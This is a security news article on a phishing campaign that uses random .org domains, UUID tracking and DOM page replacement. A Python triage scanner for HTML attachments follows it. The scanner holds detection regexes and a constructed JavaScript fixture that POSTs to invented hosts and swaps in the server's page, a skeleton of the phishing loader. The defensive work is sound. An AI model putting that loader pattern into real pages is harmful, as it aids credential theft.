A sophisticated phishing campaign leveraging randomly generated Universally Unique Identifiers (UUIDs) has emerged, successfully bypassing Secure Email Gateways (SEGs) and evading perimeter defenses.
The attack employs an advanced JavaScript-based phishing script that combines random domain selection, dynamic UUID generation, and server-driven page replacement to steal credentials.
Unlike conventional phishing operations that rely on static redirects, this campaign demonstrates tactical precision.
The phishing script operates by embedding malicious code within HTML attachments or spoofed file-sharing platforms such as Microsoft OneDrive, SharePoint Online, DocuSign, and Adobe Acrobat Sign.
When victims interact with seemingly legitimate documents, the script activates and selects one .org domain at random from nine predefined addresses.
These domains appear bulk-generated without recognizable word patterns, deliberately designed to evade blocklists and machine learning detection systems.
The script generates a dynamic UUID to track individual victims while utilizing a hardcoded UUID as a campaign identifier.
Cofense researchers identified this unusual tactic in early February 2025, noting its ongoing nature and sophistication.
The dual UUID mechanism stands out as particularly uncommon in phishing operations.
After domain selection and UUID generation, the script sends an HTTPS POST request to the chosen server’s API endpoint.
The server responds with dynamically generated content tailored to the victim’s context, such as personalized corporate login pages.
This approach enables threat actors to replace webpage content without changing URLs.
Dynamic Page Replacement
The most deceptive aspect involves dynamic page replacement capability, manipulating browser sessions to deliver credential phishing pages without traditional redirects.
Rather than using window.location.href redirects, which change the visible URL, the script uses DOM manipulation to replace the page content with server-provided HTML while the address bar stays the same.
The server-driven nature allows real-time customization based on victim context. When users enter email addresses, the script extracts domains and signals backend infrastructure to generate corresponding branded login pages.
This personalization significantly increases victim trust while reducing suspicion. The seamless experience maintained throughout proves critical for successful credential harvesting, demonstrating how modern attacks have evolved beyond simple email deception into sophisticated browser-based manipulation.
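The traits described above (a list of non-wordlike .org hosts picked at random, client-side UUID generation beside a hardcoded campaign UUID, a scripted POST, and replacement of the whole document without navigation) are individually weak signals but together make a useful triage heuristic for HTML attachments at the gateway. The following scanner is an added example written for this page; it is not code from Cofense or from the campaign, and its regular expressions, weights, thresholds and the two attachment fixtures are this example's own assumptions.

```python
"""Heuristic triage of HTML attachments for the traits described above.
Patterns and weights are this example's own assumptions, not published
signatures; tune them against your own attachment corpus."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Quoted bare hostnames under .org, e.g. "abcdefgh.org" (assumption: the
# script keeps its server list as string literals).
ORG_DOMAIN = re.compile(r"""["']([a-z0-9-]+)\.org["']""", re.I)
# Picking an array element by index from Math.random() * array.length.
RANDOM_PICK = re.compile(r"Math\.random\(\)\s*\*\s*\w+\.length")
# Common client-side UUID generators: WebCrypto or the classic template trick.
UUID_GENERATOR = re.compile(
    r"crypto\.randomUUID\s*\(|xxxxxxxx-xxxx-4xxx-yxxx|\.replace\(\s*/\[xy\]/g", re.I)
# A UUID written out as a literal (the campaign identifier in the article).
UUID_LITERAL = re.compile(
    r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I)
# Scripted POST via fetch() options or XMLHttpRequest.open(); a plain HTML
# <form method="POST"> deliberately does not match.
POST_REQUEST = re.compile(r"""method\s*:\s*["']POST["']|\.open\(\s*["']POST["']""", re.I)
# Whole-document replacement without a navigation (no URL change).
DOM_REPLACE = re.compile(
    r"document\.(?:body|documentElement)\.(?:inner|outer)HTML\s*=|document\.write(?:ln)?\s*\(")


def looks_bulk_generated(label: str) -> bool:
    """Crude 'not a word' test for a hostname label: few vowels or a long
    consonant run. Stands in for the 'no recognizable word patterns'
    observation; a dictionary or n-gram model would be stronger."""
    letters = "".join(c for c in label.lower() if c.isalpha())
    if len(letters) < 6:
        return False
    vowels = sum(c in "aeiouy" for c in letters)
    longest_run = max((len(r) for r in re.findall(r"[^aeiouy]+", letters)), default=0)
    return vowels / len(letters) < 0.25 or longest_run >= 5


@dataclass
class Verdict:
    score: int = 0
    indicators: list[str] = field(default_factory=list)

    def hit(self, name: str, weight: int) -> None:
        self.indicators.append(name)
        self.score += weight


def scan_html(html: str) -> Verdict:
    """Score one attachment; each indicator is weak alone, the combination is not."""
    v = Verdict()
    generated = [d for d in ORG_DOMAIN.findall(html) if looks_bulk_generated(d)]
    if len(generated) >= 3:
        v.hit(f"list of {len(generated)} non-wordlike .org hosts", 3)
    if RANDOM_PICK.search(html):
        v.hit("random element picked from an array", 1)
    if UUID_GENERATOR.search(html):
        v.hit("client-side UUID generation", 2)
    if UUID_LITERAL.search(html):
        v.hit("hardcoded UUID literal", 1)
    if POST_REQUEST.search(html):
        v.hit("scripted POST request", 1)
    if DOM_REPLACE.search(html):
        v.hit("whole-document DOM replacement", 2)
    return v


def classify(v: Verdict) -> str:
    """Thresholds are arbitrary starting points for a triage queue."""
    if v.score >= 6:
        return "quarantine"
    if v.score >= 3:
        return "review"
    return "clean"


# Constructed fixtures. Hosts and UUID are invented; the snippet only carries
# the traits the scanner looks for and talks to no real server.
SUSPICIOUS_ATTACHMENT = """<html><body><script>
var hosts = ["qzxvtrkw.org", "bvkprtzn.org", "gxwlsdqm.org"];
var host = hosts[Math.floor(Math.random() * hosts.length)];
var campaign = "11111111-2222-4333-8444-555555555555";
var visitor = crypto.randomUUID();
fetch("https://" + host + "/api", {method: "POST", body: campaign + visitor})
  .then(function (r) { return r.text(); })
  .then(function (page) { document.body.innerHTML = page; });
</script></body></html>"""

BENIGN_ATTACHMENT = """<html><body>
<form method="POST" action="https://login.example.org/session">
  <input name="user"><input name="pass" type="password"></form>
<p id="status"></p>
<script>document.getElementById("status").innerHTML = "Ready";</script>
</body></html>"""

if __name__ == "__main__":
    for name, html in (("suspicious", SUSPICIOUS_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        verdict = scan_html(html)
        print(name, classify(verdict), verdict.score, verdict.indicators)
```

The benign fixture shows why the patterns are deliberately narrow: a form with `method="POST"` and an `innerHTML` write to a single element are everyday HTML and score nothing, whereas a scripted POST whose response replaces `document.body` is the behaviour the article describes. Run the scanner over quarantined HTML attachments and route anything at "review" or above to an analyst rather than blocking on the score alone.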